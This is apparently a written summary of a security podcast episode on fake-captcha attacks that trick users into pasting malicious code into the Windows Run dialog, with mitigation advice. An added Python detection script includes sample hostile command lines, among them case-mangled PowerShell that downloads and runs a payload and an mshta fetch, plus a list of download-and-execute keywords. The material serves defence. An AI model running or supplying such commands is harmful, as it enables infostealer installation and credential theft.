CyberWire Daily – "Browser attacks without downloads" [Research Saturday]
Date: September 20, 2025
Host: Dave Bittner (A), N2K Networks
Guest: Nati Tal (B), Head of Guardiolabs
Episode Overview
This Research Saturday episode delves into the evolution of browser-based threats—specifically, a campaign researchers have dubbed "captchageddon," which weaponizes browser captchas to trick users into unwittingly running malicious code. Rather than relying on traditional downloads, these attacks hijack familiar user flows and psychological conditioning to gain access and steal information. Dave Bittner (host) speaks with Nati Tal from Guardiolabs about how these attacks work, their propagation, evasion tactics, and strategies for protection.
Key Discussion Points and Insights
1. Anatomy of the Browser-Based Attack (Captchageddon)
- Social Engineering with Familiar Flows:
  Attackers use fake captchas, a ubiquitous web element, to gain user trust and trick them into running code.
  - Quote: “This type of attack is trying to fool the visitors of a website to do something that they used to do, like updating their browser in the early phases with a clear fake or in this case solving a captcha.”
    — Nati Tal [01:43]
- How it Works:
  - The user encounters a captcha (either as a popup or page overlay) asking for unusual interactions—often keyboard shortcuts.
  - Malicious code is quietly copied to the clipboard.
  - Instructions urge the user to open the Run window (on Windows), paste, and execute, thinking they're verifying human presence.
  - The result: infostealer malware is silently installed, compromising browser data, credentials, and potentially banking details.
  - Quote: “You actually open up the run window in your Windows system, you paste that malicious code into it and press enter to execute it… it's all done in a matter of milliseconds.”
    — Nati Tal [02:32]
2. Evolution of Attack Delivery
- From Malvertising to Compromised Legit Sites:
  - Initially, attackers used "malvertising"—serving malicious captchas as popups from gray-area streaming and download sites.
  - The strategy shifted as attackers sought more lucrative victims. They started compromising legitimate (often WordPress-based) websites and injecting scripts into them, increasing their reach and the trust users place in the page.
  - Quote: “They compromise those websites... inject their own scripts... captcha is popping up on your screen, which is again, quite usual to see... you also trust the website because you know this website, it's legit, it's well known.”
    — Nati Tal [04:34]
- Leveraging Trust by Mimicry:
  Attackers brand the fake captchas with site logos to maximize legitimacy, making it harder for users to spot the deception.
3. Psychological Tactics—Conditioning and Reflexive Actions
- Lowered Defenses through Familiarity:
  Captchas are a “trusted nuisance,” so users act reflexively, often without questioning authenticity.
  - Quote: “We hardly notice them when they pop up and we sort of reflexively click where we need to click and try to move on.”
    — Dave Bittner [08:52]
- Effectiveness:
  The attack exploits this monotonous task—users are “conditioned to complete them” and may not notice subtle differences.
4. Spread and Targeting
- Global to Focused Reach:
  - Started as a broad, global “spray and pray” campaign via malvertising.
  - Has become more focused: attackers now compromise popular, high-traffic sites, and even use social media campaigns and targeted ads (e.g., Facebook “recipe” links requiring captchas).
  - Quote: “We even saw some sponsored posts in Facebook about some recipes for cookies or something like that. But the link there goes to a captcha... allows attackers... to target specific people.”
    — Nati Tal [13:05]
- Industry-Specific Targeting:
  - Notably, Booking.com hosts/owners have been specifically targeted through phishing campaigns using the captcha ploy—giving the attack more legitimacy than standard fake login pages.
5. Evasion and Persistence Tactics
- Technical Evolution:
  - Early campaigns used plain, detectable HTML and PowerShell code.
  - Attackers now generate unique, obfuscated scripts per page load, mangle upper/lowercase in commands to defeat string matching, and redirect through multiple pages to evade security tools.
  - Quote: “They are actually generating those kinds of scams on the fly... redirecting to different kinds of pages along the way…”
    — Nati Tal [16:19]
- Continuous Arms Race:
  Security firms and attackers are locked in an ongoing cycle of attack and defense.
6. Defensive Recommendations
- Awareness & Education:
  - Teach users and employees to be suspicious of captchas that demand unusual actions—especially running code or opening system dialogs.
  - Quote: “Being familiar with this kind of attack is the most important part… if they were aware that this type of attack is here... it's the foremost important part of mitigating it.”
    — Nati Tal [18:29]
- Technical Controls:
  - Disable PowerShell for non-technical users/enterprise endpoints via registry or policy—most users don't need it.
  - Employ robust, layered endpoint security solutions beyond browser and OS defaults.
  - Quote: “We really need something more powerful in between that will know to catch those types of attacks before they hit us.”
    — Nati Tal [18:29]
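The evasion section (case-mangled commands, execution from the Run window) and the technical-controls list above both point at one endpoint signal: an interactive script host spawned under explorer.exe with arguments that fetch a payload or are case-mangled. The Python below is an added example, not code from the episode or from Guardio; it assumes Sysmon Event ID 1 field names (ParentImage, Image, CommandLine) and scores a few constructed sample records, normalizing case before matching so the caps/lowercase mangling does not hide the download-and-run vocabulary.

```python
import re

# Constructed sample process-creation records with Sysmon Event ID 1 field names
# (not real telemetry). Record 0 is the pattern the episode describes: the Run
# dialog (a child of explorer.exe) launching case-mangled PowerShell that fetches
# and runs a payload. Records 1 and 2 are there for contrast.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'pOwErShElL -W hIdDeN -Ep ByPaSs -C "iRm https://example.invalid/v | iEx"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # a shell opened from the Start menu
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Download-and-run vocabulary, matched on the lower-cased command line so the
# caps/lowercase mangling the episode mentions cannot hide it.
DOWNLOAD_EXEC = ("iex", "invoke-expression", "irm", "invoke-webrequest", "downloadstring",
                 "frombase64string", "-enc", "http://", "https://")

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def case_mangled(text, min_flips=4):
    # pOwErShElL has 9 upper/lower flips; ordinary CamelCase such as PowerShell has 3.
    for word in re.findall(r"[A-Za-z]{6,}", text):
        flips = sum(1 for a, b in zip(word, word[1:]) if a.isupper() != b.isupper())
        if flips >= min_flips:
            return True
    return False

def reasons_for(event):
    """Signals one event triggers; an empty list means nothing fired."""
    hits, cmd = [], event["CommandLine"].lower()
    if basename(event["ParentImage"]) == "explorer.exe":
        hits.append("parent-is-explorer")  # weak alone: Start menu launches look the same
    if basename(event["Image"]) in SCRIPT_HOSTS:
        hits.append("script-host")
    if any(tok in cmd for tok in DOWNLOAD_EXEC):
        hits.append("download-exec")
    if case_mangled(event["CommandLine"]):
        hits.append("case-obfuscation")
    return hits

def is_clickfix_like(event):
    r = reasons_for(event)
    return "parent-is-explorer" in r and "script-host" in r and ("download-exec" in r or "case-obfuscation" in r)
```

Records 0 and 1 fire; record 2 (a shell opened by hand) does not, because explorer.exe as parent is only a weak signal until it is combined with payload-fetching or case-mangled arguments.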
Notable Quotes & Memorable Moments
- On Social Engineering:
  “Captcha is unfortunately a brilliant decision by them because captchas are all around everywhere and so easy to replicate, to fake them.”
  — Nati Tal [09:19]
- On Infamous Origins:
  “I love John Hammond, he's a good friend. But for the history, I guess he will be known as the one that presented this fake captcha to the world, although it kind of just enhanced it because he already saw this kind of attack in the wild.”
  — Nati Tal [09:19]
- On Continuous Threat:
  “It will continue forever as long as they are able to get value from this kind of attack… it's here for more than... almost two years now I think from the very first time we saw that and it's here to stay.”
  — Nati Tal [16:19]
Key Timestamps for Important Segments
- [01:43] — Introduction to the attack and how it exploits familiar actions like captchas.
- [02:32] — Detailed walkthrough of how the attack manipulates users into running code.
- [04:34] — Evolution from malvertising to compromising legitimate websites.
- [09:19] — Discussion of psychological tricks and the role of social engineering.
- [13:05] — Spread, targeted audiences, and sector-specific campaigns.
- [16:19] — Technical evolution of the attack and evasion techniques.
- [18:29] — Recommendations for mitigation: user and enterprise strategies.
Conclusion
This episode of Research Saturday spotlights a dangerous evolution in browser-based attacks: the weaponization of familiar user-flow via fake captchas. The tactics leverage both technical evasion and psychological conditioning, moving from malvertising to widescale compromise of legitimate, high-traffic sites. Nati Tal emphasizes the critical importance of awareness, technical controls (like disabling PowerShell), and strong security layers to protect both organizations and individuals as these attacks become ever more sophisticated.
For Further Reading:
See show notes for a link to Guardiolabs' detailed research on this threat.